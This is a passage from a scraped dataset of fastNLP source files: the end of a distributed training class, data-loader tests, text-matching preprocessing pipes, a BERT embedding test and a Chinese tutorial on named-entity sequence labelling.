self.cp_save_path = None\n\n # use INFO in the master, WARN for others\n logger.setLevel(logging.INFO if self.is_master else logging.WARNING)\n self.logger = logger\n self.logger.info(\"Setup Distributed Trainer\")\n self.logger.warning(\"Process pid: {}, rank: {}, local rank: {}, device: {}, fp16: {}\".format(\n os.getpid(), self.rank, self.local_rank, self.device, self.fp16 if self.fp16 else False))\n self.logger.info(\"Num of processes: {}\".format(self.world_size))\n self.logger.info(\"Use device: {}\".format(device))\n self.logger.info(\"Training with fp16: {}, optimization level: {}\".format(\n len(self.fp16) > 0, self.fp16 if self.fp16 else None))\n\n def _get_n_steps(self):\n 
batch_size = self.world_size * self.batch_size_per_gpu\n        n_steps_per_epoch = len(self.train_data) // batch_size\n        if not self.drop_last and len(self.train_data) % batch_size != 0:\n            n_steps_per_epoch += 1\n        return n_steps_per_epoch * self.n_epochs\n\n    def _get_data_iter(self, dataset):\n        if isinstance(dataset, DataSet):\n            return DataSetIter(\n                dataset=dataset, batch_size=self.batch_size_per_gpu,\n                num_workers=self.num_data_workers, sampler=self.sampler,\n                drop_last=self.drop_last\n            )\n        elif isinstance(dataset, BatchIter):\n            return dataset\n        else:\n            raise TypeError(\"train_data type {} not supported\".format(type(dataset)))\n\n    def _get_optimizer(self, optimizer):\n        if isinstance(optimizer, torch.optim.Optimizer):\n            return optimizer\n        elif isinstance(optimizer, Optimizer):\n            return optimizer.construct_from_pytorch(self.model.parameters())\n        elif optimizer is None:\n            return torch.optim.Adam(self.model.parameters(), lr=4e-3)\n        else:\n            raise TypeError(\"optimizer can only be torch.optim.Optimizer type, not {}.\".format(type(optimizer)))\n\n    @property\n    def is_master(self):\n        return self.rank == 0\n\n    def train(self, on_exception='auto'):\n        try:\n            self.logger.info(\"###### Training epochs started ######\")\n            self.logger.info('Total epochs: %d'% self.n_epochs)\n            self.logger.info('Total steps: %d'% self.n_steps)\n            self.logger.info('Num instances per GPU %d'% self.batch_size_per_gpu)\n            self.logger.info('Total batch_size: %d' % (self.batch_size_per_gpu * dist.get_world_size()))\n            self.logger.info('Total num of samples: %d'% len(self.train_data))\n            self.logger.info(\"Num of callbacks for all workers: {}\".format(\n                len(self.callback_manager.callbacks_all)))\n            self.logger.info(\"Num of callbacks for master workers: {}\".format(\n                len(self.callback_manager.callbacks_master)))\n            self.logger.info(\"Callbacks for all workers: {}\".format(\n                [repr(cb) for cb in self.callback_manager.callbacks_all]))\n            self.logger.info(\"Callbacks for master workers: {}\".format(\n                [repr(cb) for cb in self.callback_manager.callbacks_master]))\n\n            start_time = time.time()\n            results = {}\n            if self.n_epochs <= 0:\n                self.logger.info(\"Training epoch is {}, nothing was done.\".format(self.n_epochs))\n                results['seconds'] = 0.\n                return results\n\n            try:\n                self.callback_manager.on_train_begin()\n                self._train()\n                self.callback_manager.on_train_end()\n\n            except BaseException as e:\n                self.callback_manager.on_exception(e)\n                if on_exception == 'auto':\n                    if not isinstance(e, (CallbackException, KeyboardInterrupt)):\n                        raise e\n                    else:\n                        self.logger.info('Caught {}, ignored.'.format(e.__class__.__name__))\n                elif on_exception == 'raise':\n                    raise e\n\n            results['seconds'] = round(time.time() - start_time, 2)\n            self.logger.info(\"###### Train finished ######\")\n            self.logger.info('Total train time: {} seconds.'. 
format(results['seconds']))\n return results\n finally:\n self.close()\n\n def _train(self):\n if self.fp16:\n # skip check, done in __init__()\n from apex import amp\n self.step = 0\n self.epoch = 0\n self.pbar = tqdm(total=self.n_steps, postfix='loss:{0:<6.5f}',\n leave=False, dynamic_ncols=True, disable=not self.is_master)\n pbar = self.pbar\n avg_loss = 0\n data_iterator = self.data_iterator\n self.model.zero_grad()\n for epoch in range(1, self.n_epochs + 1):\n self.epoch = epoch\n pbar.set_description_str(desc=\"Epoch {}/{}\".format(epoch, self.n_epochs))\n # early stopping\n self.callback_manager.on_epoch_begin()\n for batch_x, batch_y in data_iterator:\n self.model.train()\n self.step += 1\n _move_dict_value_to_device(batch_x, batch_y, device=self.device)\n indices = data_iterator.get_batch_indices()\n # negative sampling; replace unknown; re-weight batch_y\n self.callback_manager.on_batch_begin(batch_x, batch_y, indices)\n prediction = self._data_forward(self.model, batch_x)\n\n # edit prediction\n self.callback_manager.on_loss_begin(batch_y, prediction)\n loss = self._compute_loss(prediction, batch_y)\n avg_loss += loss.item()\n\n # Is loss NaN or inf? requires_grad = False\n self.callback_manager.on_backward_begin(loss)\n\n if self.fp16:\n with amp.scale_loss(loss, self.optimizer) as scale_loss:\n scale_loss.backward()\n else:\n loss.backward()\n\n self.callback_manager.on_backward_end()\n\n self._update()\n self.callback_manager.on_step_end()\n\n if self.step % self.print_every == 0:\n avg_loss = float(avg_loss) / self.print_every\n print_output = \"loss:{:<6.5f}\".format(avg_loss)\n pbar.update(self.print_every)\n pbar.set_postfix_str(print_output)\n avg_loss = 0\n\n self.callback_manager.on_batch_end()\n\n if (self.validate_every > 0 and self.step % self.validate_every == 0):\n self._do_validation()\n\n if self.cp_save_path and \\\n self.save_every > 0 and \\\n self.step % self.save_every == 0:\n self.save_check_point()\n\n # ================= mini-batch end ==================== #\n if self.validate_every < 0:\n self._do_validation()\n\n if self.save_every < 0 and self.cp_save_path:\n self.save_check_point()\n # lr decay; early stopping\n self.callback_manager.on_epoch_end()\n # =============== epochs end =================== #\n pbar.close()\n self.pbar = None\n # ============ tqdm end ============== #\n\n def _update(self):\n \"\"\"Perform weight update on a model.\n\n \"\"\"\n if self.step % self.update_every == 0:\n self.optimizer.step()\n self.model.zero_grad()\n\n def _data_forward(self, network, x):\n x = _build_args(self._forward_func, **x)\n y = network(**x)\n if not isinstance(y, dict):\n raise TypeError(\n f\"The return value of {_get_func_signature(self._forward_func)} should be dict, got {type(y)}.\")\n return y\n\n def _compute_loss(self, predict, truth):\n \"\"\"Compute loss given prediction and ground truth.\n\n :param predict: prediction dict, produced by model.forward\n :param truth: ground truth dict, produced by batch_y\n :return: a scalar\n \"\"\"\n loss = self.losser(predict, truth)\n if self.update_every > 1:\n loss = loss / self.update_every\n return loss.mean()\n\n def save_check_point(self, only_params=False):\n # only master save models\n if self.is_master:\n os.makedirs(self.cp_save_path, exist_ok=True)\n path = os.path.join(self.cp_save_path, 'checkpoint-{}.bin'.format(self.step))\n self.logger.info(\"Save checkpoint to {}\".format(path))\n model_to_save = self.model.module\n if only_params:\n model_to_save = model_to_save.state_dict()\n 
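_compute_loss and _update above cooperate to implement gradient accumulation: every backward pass uses loss / update_every, and the optimizer steps once per update_every batches, approximating a batch update_every times larger. A sketch of the stepping pattern alone::

    update_every = 4
    for step in range(1, 9):
        # loss.backward() would run here, with loss scaled by 1 / update_every
        if step % update_every == 0:
            print(f"step {step}: optimizer.step(); model.zero_grad()")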
torch.save(model_to_save, path)\n\n def _do_validation(self):\n self.callback_manager.on_valid_begin()\n eval_res = self.callback_manager.on_validation()\n eval_res = list(filter(lambda x: x is not None, eval_res))\n if len(eval_res):\n eval_res, is_better = list(zip(*eval_res))\n else:\n eval_res, is_better = None, None\n self.callback_manager.on_valid_end(\n eval_res, self.metric_key, self.optimizer, is_better)\n dist.barrier()\n\n def close(self):\n dist.destroy_process_group()\n" }, { "alpha_fraction": 0.622535228729248, "alphanum_fraction": 0.6323943734169006, "avg_line_length": 44.27659606933594, "blob_id": "1ce326efc014e752e0e22f266d2e969d987be177", "content_id": "fdfc90081154217d70e7f55f6fcfe83d63948373", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2130, "license_type": "permissive", "max_line_length": 114, "num_lines": 47, "path": "/test/io/loader/test_classification_loader.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nfrom fastNLP.io import DataBundle\nfrom fastNLP.io.loader.classification import YelpFullLoader\nfrom fastNLP.io.loader.classification import YelpPolarityLoader\nfrom fastNLP.io.loader.classification import IMDBLoader\nfrom fastNLP.io.loader.classification import SST2Loader\nfrom fastNLP.io.loader.classification import SSTLoader\nfrom fastNLP.io.loader.classification import ChnSentiCorpLoader\nimport os\n\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestDownload(unittest.TestCase):\n def test_download(self):\n for loader in [YelpFullLoader, YelpPolarityLoader, IMDBLoader, SST2Loader, SSTLoader, ChnSentiCorpLoader]:\n loader().download()\n\n def test_load(self):\n for loader in [YelpFullLoader, YelpPolarityLoader, IMDBLoader, SST2Loader, SSTLoader, ChnSentiCorpLoader]:\n data_bundle = loader().load()\n print(data_bundle)\n\n\nclass TestLoad(unittest.TestCase):\n def test_process_from_file(self):\n data_set_dict = {\n 'yelp.p': ('test/data_for_tests/io/yelp_review_polarity', YelpPolarityLoader, (6, 6, 6), False),\n 'yelp.f': ('test/data_for_tests/io/yelp_review_full', YelpFullLoader, (6, 6, 6), False),\n 'sst-2': ('test/data_for_tests/io/SST-2', SST2Loader, (5, 5, 5), True),\n 'sst': ('test/data_for_tests/io/SST', SSTLoader, (6, 6, 6), False),\n 'imdb': ('test/data_for_tests/io/imdb', IMDBLoader, (6, 6, 6), False),\n }\n for k, v in data_set_dict.items():\n path, loader, data_set, warns = v\n with self.subTest(loader=loader):\n if warns:\n with self.assertWarns(Warning):\n data_bundle = loader().load(path)\n else:\n data_bundle = loader().load(path)\n\n self.assertTrue(isinstance(data_bundle, DataBundle))\n self.assertEqual(len(data_set), data_bundle.num_dataset)\n for x, y in zip(data_set, data_bundle.iter_datasets()):\n name, dataset = y\n self.assertEqual(x, len(dataset))\n\n" }, { "alpha_fraction": 0.5733829736709595, "alphanum_fraction": 0.5812353491783142, "avg_line_length": 39.63486862182617, "blob_id": "d6f6843d3d27ee62dd06697a80ecc5c116dda789", "content_id": "d6506f669bdc034f49e8877f9b8ecae7fbe424fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12959, "license_type": "permissive", "max_line_length": 117, "num_lines": 304, "path": "/fastNLP/io/pipe/matching.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"MatchingBertPipe\",\n \"RTEBertPipe\",\n \"SNLIBertPipe\",\n 
\"QuoraBertPipe\",\n \"QNLIBertPipe\",\n \"MNLIBertPipe\",\n \"MatchingPipe\",\n \"RTEPipe\",\n \"SNLIPipe\",\n \"QuoraPipe\",\n \"QNLIPipe\",\n \"MNLIPipe\",\n]\n\nimport warnings\n\nfrom .pipe import Pipe\nfrom .utils import get_tokenizer\nfrom ..loader.matching import SNLILoader, MNLILoader, QNLILoader, RTELoader, QuoraLoader\nfrom ...core.const import Const\nfrom ...core.vocabulary import Vocabulary\nfrom ...core._logger import logger\n\n\nclass MatchingBertPipe(Pipe):\n \"\"\"\n Matching任务的Bert pipe,输出的DataSet将包含以下的field\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"words\", \"target\", \"seq_len\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"[2, 3, 4, 5, ...]\", 1, 10\n \"This site includes a...\", \"The Government Executive...\", \"[11, 12, 13,...]\", 0, 5\n \"...\", \"...\", \"[...]\", ., .\n\n words列是将raw_words1(即premise), raw_words2(即hypothesis)使用\"[SEP]\"链接起来转换为index的。\n words列被设置为input,target列被设置为target和input(设置为input以方便在forward函数中计算loss,\n 如果不在forward函数中计算loss也不影响,fastNLP将根据forward函数的形参名进行传参).\n\n \"\"\"\n \n def __init__(self, lower=False, tokenizer: str = 'raw'):\n \"\"\"\n \n :param bool lower: 是否将word小写化。\n :param str tokenizer: 使用什么tokenizer来将句子切分为words. 支持spacy, raw两种。raw即使用空格拆分。\n \"\"\"\n super().__init__()\n \n self.lower = bool(lower)\n self.tokenizer = get_tokenizer(tokenize_method=tokenizer)\n \n def _tokenize(self, data_bundle, field_names, new_field_names):\n \"\"\"\n\n :param DataBundle data_bundle: DataBundle.\n :param list field_names: List[str], 需要tokenize的field名称\n :param list new_field_names: List[str], tokenize之后field的名称,与field_names一一对应。\n :return: 输入的DataBundle对象\n \"\"\"\n for name, dataset in data_bundle.datasets.items():\n for field_name, new_field_name in zip(field_names, new_field_names):\n dataset.apply_field(lambda words: self.tokenizer(words), field_name=field_name,\n new_field_name=new_field_name)\n return data_bundle\n \n def process(self, data_bundle):\n for dataset in data_bundle.datasets.values():\n if dataset.has_field(Const.TARGET):\n dataset.drop(lambda x: x[Const.TARGET] == '-')\n \n for name, dataset in data_bundle.datasets.items():\n dataset.copy_field(Const.RAW_WORDS(0), Const.INPUTS(0), )\n dataset.copy_field(Const.RAW_WORDS(1), Const.INPUTS(1), )\n \n if self.lower:\n for name, dataset in data_bundle.datasets.items():\n dataset[Const.INPUTS(0)].lower()\n dataset[Const.INPUTS(1)].lower()\n \n data_bundle = self._tokenize(data_bundle, [Const.INPUTS(0), Const.INPUTS(1)],\n [Const.INPUTS(0), Const.INPUTS(1)])\n \n # concat两个words\n def concat(ins):\n words0 = ins[Const.INPUTS(0)]\n words1 = ins[Const.INPUTS(1)]\n words = words0 + ['[SEP]'] + words1\n return words\n \n for name, dataset in data_bundle.datasets.items():\n dataset.apply(concat, new_field_name=Const.INPUT)\n dataset.delete_field(Const.INPUTS(0))\n dataset.delete_field(Const.INPUTS(1))\n \n word_vocab = Vocabulary()\n word_vocab.from_dataset(*[dataset for name, dataset in data_bundle.datasets.items() if 'train' in name],\n field_name=Const.INPUT,\n no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n 'train' not in name])\n word_vocab.index_dataset(*data_bundle.datasets.values(), field_name=Const.INPUT)\n \n target_vocab = Vocabulary(padding=None, unknown=None)\n target_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n field_name=Const.TARGET,\n no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n if ('train' not in name) and 
(ds.has_field(Const.TARGET))]\n                                   )\n        if len(target_vocab._no_create_word) > 0:\n            warn_msg = f\"There are {len(target_vocab._no_create_word)} target labels\" \\\n                       f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n                       f\"data sets but not in the train data set.\"\n            warnings.warn(warn_msg)\n            logger.warning(warn_msg)\n\n        has_target_datasets = [dataset for name, dataset in data_bundle.datasets.items() if\n                               dataset.has_field(Const.TARGET)]\n        target_vocab.index_dataset(*has_target_datasets, field_name=Const.TARGET)\n        \n        data_bundle.set_vocab(word_vocab, Const.INPUT)\n        data_bundle.set_vocab(target_vocab, Const.TARGET)\n        \n        input_fields = [Const.INPUT, Const.INPUT_LEN]\n        target_fields = [Const.TARGET]\n        \n        for name, dataset in data_bundle.datasets.items():\n            dataset.add_seq_len(Const.INPUT)\n            dataset.set_input(*input_fields, flag=True)\n            for fields in target_fields:\n                if dataset.has_field(fields):\n                    dataset.set_target(fields, flag=True)\n        \n        return data_bundle\n\n\nclass RTEBertPipe(MatchingBertPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = RTELoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass SNLIBertPipe(MatchingBertPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = SNLILoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass QuoraBertPipe(MatchingBertPipe):\n    def process_from_file(self, paths):\n        data_bundle = QuoraLoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass QNLIBertPipe(MatchingBertPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = QNLILoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass MNLIBertPipe(MatchingBertPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = MNLILoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass MatchingPipe(Pipe):\n    \"\"\"\n    Matching任务的Pipe。输出的DataSet将包含以下的field\n\n    .. csv-table::\n       :header: \"raw_words1\", \"raw_words2\", \"words1\", \"words2\", \"target\", \"seq_len1\", \"seq_len2\"\n\n       \"The new rights are...\", \"Everyone really likes..\", \"[2, 3, 4, 5, ...]\", \"[10, 20, 6]\", 1, 10, 13\n       \"This site includes a...\", \"The Government Executive...\", \"[11, 12, 13,...]\", \"[2, 7, ...]\", 0, 6, 7\n       \"...\", \"...\", \"[...]\", \"[...]\", ., ., .\n\n    words1是premise,words2是hypothesis。其中words1,words2,seq_len1,seq_len2被设置为input;target被设置为target\n    和input(设置为input以方便在forward函数中计算loss,如果不在forward函数中计算loss也不影响,fastNLP将根据forward函数\n    的形参名进行传参)。\n    \"\"\"\n    \n    def __init__(self, lower=False, tokenizer: str = 'raw'):\n        \"\"\"\n        \n        :param bool lower: 是否将所有raw_words转为小写。\n        :param str tokenizer: 将原始数据tokenize的方式。支持spacy, raw. spacy是使用spacy切分,raw就是用空格切分。\n        \"\"\"\n        super().__init__()\n        \n        self.lower = bool(lower)\n        self.tokenizer = get_tokenizer(tokenize_method=tokenizer)\n    \n    def _tokenize(self, data_bundle, field_names, new_field_names):\n        \"\"\"\n\n        :param ~fastNLP.DataBundle data_bundle: DataBundle.\n        :param list field_names: List[str], 需要tokenize的field名称\n        :param list new_field_names: List[str], tokenize之后field的名称,与field_names一一对应。\n        :return: 输入的DataBundle对象\n        \"\"\"\n        for name, dataset in data_bundle.datasets.items():\n            for field_name, new_field_name in zip(field_names, new_field_names):\n                dataset.apply_field(lambda words: self.tokenizer(words), field_name=field_name,\n                                    new_field_name=new_field_name)\n        return data_bundle\n    \n    def process(self, data_bundle):\n        \"\"\"\n        接受的DataBundle中的DataSet应该具有以下的field, target列可以没有\n\n        .. 
csv-table::\n           :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n           \"The new rights are...\", \"Everyone really likes..\", \"entailment\"\n           \"This site includes a...\", \"The Government Executive...\", \"not_entailment\"\n           \"...\", \"...\"\n\n        :param ~fastNLP.DataBundle data_bundle: 通过loader读取得到的data_bundle,里面包含了数据集的原始数据内容\n        :return: data_bundle\n        \"\"\"\n        data_bundle = self._tokenize(data_bundle, [Const.RAW_WORDS(0), Const.RAW_WORDS(1)],\n                                     [Const.INPUTS(0), Const.INPUTS(1)])\n        \n        for dataset in data_bundle.datasets.values():\n            if dataset.has_field(Const.TARGET):\n                dataset.drop(lambda x: x[Const.TARGET] == '-')\n        \n        if self.lower:\n            for name, dataset in data_bundle.datasets.items():\n                dataset[Const.INPUTS(0)].lower()\n                dataset[Const.INPUTS(1)].lower()\n        \n        word_vocab = Vocabulary()\n        word_vocab.from_dataset(*[dataset for name, dataset in data_bundle.datasets.items() if 'train' in name],\n                                field_name=[Const.INPUTS(0), Const.INPUTS(1)],\n                                no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n                                                         'train' not in name])\n        word_vocab.index_dataset(*data_bundle.datasets.values(), field_name=[Const.INPUTS(0), Const.INPUTS(1)])\n        \n        target_vocab = Vocabulary(padding=None, unknown=None)\n        target_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n                                  field_name=Const.TARGET,\n                                  no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n                                                           if ('train' not in name) and (ds.has_field(Const.TARGET))]\n                                  )\n        if len(target_vocab._no_create_word) > 0:\n            warn_msg = f\"There are {len(target_vocab._no_create_word)} target labels\" \\\n                       f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n                       f\"data set but not in train data set!\"\n            warnings.warn(warn_msg)\n            logger.warn(warn_msg)\n\n        has_target_datasets = [dataset for name, dataset in data_bundle.datasets.items() if\n                               dataset.has_field(Const.TARGET)]\n        target_vocab.index_dataset(*has_target_datasets, field_name=Const.TARGET)\n        \n        data_bundle.set_vocab(word_vocab, Const.INPUTS(0))\n        data_bundle.set_vocab(target_vocab, Const.TARGET)\n        \n        input_fields = [Const.INPUTS(0), Const.INPUTS(1), Const.INPUT_LENS(0), Const.INPUT_LENS(1)]\n        target_fields = [Const.TARGET]\n        \n        for name, dataset in data_bundle.datasets.items():\n            dataset.add_seq_len(Const.INPUTS(0), Const.INPUT_LENS(0))\n            dataset.add_seq_len(Const.INPUTS(1), Const.INPUT_LENS(1))\n            dataset.set_input(*input_fields, flag=True)\n            for fields in target_fields:\n                if dataset.has_field(fields):\n                    dataset.set_target(fields, flag=True)\n        \n        return data_bundle\n\n\nclass RTEPipe(MatchingPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = RTELoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass SNLIPipe(MatchingPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = SNLILoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass QuoraPipe(MatchingPipe):\n    def process_from_file(self, paths):\n        data_bundle = QuoraLoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass QNLIPipe(MatchingPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = QNLILoader().load(paths)\n        return self.process(data_bundle)\n\n\nclass MNLIPipe(MatchingPipe):\n    def process_from_file(self, paths=None):\n        data_bundle = MNLILoader().load(paths)\n        return self.process(data_bundle)\n" }, { "alpha_fraction": 0.5947271585464478, "alphanum_fraction": 0.6100552082061768, "avg_line_length": 40.82051467895508, "blob_id": "d1061d3ca4332a9f53b0cd88f54f54d0a6d30549", "content_id": 
"715114584bee8781a0ce52296c3d72508b6afb2a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1631, "license_type": "permissive", "max_line_length": 116, "num_lines": 39, "path": "/test/embeddings/test_bert_embedding.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\nfrom fastNLP import Vocabulary\nfrom fastNLP.embeddings import BertEmbedding\nimport torch\nimport os\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestDownload(unittest.TestCase):\n def test_download(self):\n # import os\n vocab = Vocabulary().add_word_lst(\"This is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='en')\n words = torch.LongTensor([[2, 3, 4, 0]])\n print(embed(words).size())\n\n for pool_method in ['first', 'last', 'max', 'avg']:\n for include_cls_sep in [True, False]:\n embed = BertEmbedding(vocab, model_dir_or_name='en', pool_method=pool_method,\n include_cls_sep=include_cls_sep)\n print(embed(words).size())\n\n def test_word_drop(self):\n vocab = Vocabulary().add_word_lst(\"This is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='en', dropout=0.1, word_dropout=0.2)\n for i in range(10):\n words = torch.LongTensor([[2, 3, 4, 0]])\n print(embed(words).size())\n\n\nclass TestBertEmbedding(unittest.TestCase):\n def test_bert_embedding_1(self):\n vocab = Vocabulary().add_word_lst(\"this is a test . [SEP]\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert', word_dropout=0.1)\n requires_grad = embed.requires_grad\n embed.requires_grad = not requires_grad\n embed.train()\n words = torch.LongTensor([[2, 3, 4, 0]])\n result = embed(words)\n self.assertEqual(result.size(), (1, 4, 16))\n" }, { "alpha_fraction": 0.5203609466552734, "alphanum_fraction": 0.6159185767173767, "avg_line_length": 44, "blob_id": "8938dbe494dbc91fa3eb29bfe09574f6cb01d5b1", "content_id": "7fcf97b36075862ff4091bfccd1d06ae01249f29", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5740, "license_type": "permissive", "max_line_length": 247, "num_lines": 96, "path": "/docs/source/tutorials/tutorial_9_seq_labeling.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "=====================\n快速实现序列标注模型\n=====================\n\n这一部分的内容主要展示如何使用fastNLP 实现序列标注任务。你可以使用fastNLP的各个组件快捷,方便地完成序列标注任务,达到出色的效果。\n在阅读这篇Tutorial前,希望你已经熟悉了fastNLP的基础使用,尤其是数据的载入以及模型的构建,通过这个小任务的能让你进一步熟悉fastNLP的使用。\n我们将对基于Weibo的中文社交数据集进行处理,展示如何完成命名实体标注任务的整个过程。\n\n载入数据\n===================================\nfastNLP的数据载入主要是由Loader与Pipe两个基类衔接完成的。通过Loader可以方便地载入各种类型的数据。同时,针对常见的数据集,我们已经预先实现了载入方法,其中包含weibo数据集。\n在设计dataloader时,以DataSetLoader为基类,可以改写并应用于其他数据集的载入。\n\n.. 
code-block:: python\n\n\tfrom fastNLP.io import WeiboNERLoader\n\tdata_bundle = WeiboNERLoader().load()\n\n\n\n载入后的数据如 ::\n\n\t{'dev': DataSet(\n\t{{'raw_chars': ['用', '最', '大', '努', '力', '去', '做''人', '生', '。', '哈', '哈', '哈', '哈', '哈', '哈', '\n 'target': ['O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O',, 'O', 'O', 'O', 'O', 'O', 'O'] type=list})}\n\n\t{'test': DataSet(\n\t{{'raw_chars': ['感', '恩', '大', '回', '馈'] type=list, 'target': ['O', 'O', 'O', 'O', 'O'] type=list})}\n\n\t{'train': DataSet(\n\t{'raw_chars': ['国', '安', '老', '球', '迷'] type=list, 'target': ['B-ORG.NAM', 'I-ORG.NAM', 'B-PER.NOM', 'I-PER.NOM', 'I-PER.NOM'] type=list})}\n\n\n\n数据处理\n----------------------------\n我们进一步处理数据。通过Pipe基类处理Loader载入的数据。 如果你还有印象,应该还能想起,实现自定义数据集的Pipe时,至少要编写process 函数或者process_from_file 函数。前者接受 :class:`~fastNLP.DataBundle` 类的数据,并返回该 :class:`~fastNLP.DataBundle` 。后者接收数据集所在文件夹为参数,读取并处理为 :class:`~fastNLP.DataBundle` 后,通过process 函数处理数据。\n这里我们已经实现通过Loader载入数据,并已返回 :class:`~fastNLP.DataBundle` 类的数据。我们编写process 函数以处理Loader载入后的数据。\n\n.. code-block:: python\n\n from fastNLP.io import ChineseNERPipe\n data_bundle = ChineseNERPipe(encoding_type='bioes', bigram=True).process(data_bundle)\n\n载入后的数据如下 ::\n\n {'raw_chars': ['用', '最', '大', '努', '力', '去', '做', '值', '得', '的', '事', '人', '生', '。', '哈', '哈', '哈', '哈', '哈', '哈', '我', '在'] type=list,\n 'target': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] type=list,\n 'chars': [97, 71, 34, 422, 104, 72, 144, 628, 66, 3, 158, 2, 9, 647, 485, 196, 2,19] type=list,\n 'bigrams': [5948, 1950, 34840, 98, 8413, 3961, 34841, 631, 34842, 407, 462, 45, 3 1959, 1619, 3, 3, 3, 3, 3, 2663, 29, 90] type=list,\n 'seq_len': 30 type=int}\n\n模型构建\n--------------------------------\n我们使用CNN-BILSTM-CRF模型完成这一任务。在网络构建方面,fastNLP的网络定义继承pytorch的 :class:`nn.Module` 类。\n自己可以按照pytorch的方式定义网络。需要注意的是命名。fastNLP的标准命名位于 :class:`~fastNLP.Const` 类。\n\n模型的训练\n首先实例化模型,导入所需的char embedding以及word embedding。Embedding的载入可以参考教程。\n也可以查看 :mod:`~fastNLP.embedding` 使用所需的embedding 载入方法。\nfastNLP将模型的训练过程封装在了 :class:`~fastnlp.Trainer` 类中。\n根据不同的任务调整trainer中的参数即可。通常,一个trainer实例需要有:指定的训练数据集,模型,优化器,loss函数,评测指标,以及指定训练的epoch数,batch size等参数。\n\n.. code-block:: python\n\n #实例化模型\n model = CNBiLSTMCRFNER(char_embed, num_classes=len(data_bundle.vocabs['target']), bigram_embed=bigram_embed)\n #定义评估指标\n Metrics=SpanFPreRecMetric(data_bundle.vocabs['target'], encoding_type='bioes')\n #实例化trainer并训练\n Trainer(data_bundle.datasets['train'], model, batch_size=20, metrics=Metrics, num_workers=2, dev_data=data_bundle. datasets['dev']).train()\n\n \n训练中会保存最优的参数配置。\n\n训练的结果如下 ::\n\n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.727661, pre=0.732293, rec=0.723088\n Evaluation at Epoch 1/100. Step:1405/140500. SpanFPreRecMetric: f=0.727661, pre=0.732293, rec=0.723088\n \n Evaluation on DataSet test:\n SpanFPreRecMetric: f=0.784307, pre=0.779371, rec=0.789306\n Evaluation at Epoch 2/100. Step:2810/140500. SpanFPreRecMetric: f=0.784307, pre=0.779371, rec=0.789306\n \n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.810068, pre=0.811003, rec=0.809136\n Evaluation at Epoch 3/100. Step:4215/140500. SpanFPreRecMetric: f=0.810068, pre=0.811003, rec=0.809136\n \n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.829592, pre=0.84153, rec=0.817989\n Evaluation at Epoch 4/100. Step:5620/140500. SpanFPreRecMetric: f=0.829592, pre=0.84153, rec=0.817989\n \n Evaluation on DataSet test:\n SpanFPreRecMetric: f=0.828789, pre=0.837096, rec=0.820644\n Evaluation at Epoch 5/100. Step:7025/140500. 
SpanFPreRecMetric: f=0.828789, pre=0.837096, rec=0.820644\n\n\n" } ]
17
silverasm/python-superfastmatch
https://github.com/silverasm/python-superfastmatch
4aca8f3326a0af8ee38e5c83c46d3638b91b5b22
126a5e0a7c48f5b734d38ab3c1383a1a37446020
38684bf475aa1b2f51ef72de8ae99ebbd484b43c
refs/heads/master
2021-01-15T19:50:45.559664
2012-04-11T22:02:48
2012-04-11T22:02:48
null
0
0
null
null
null
null
null
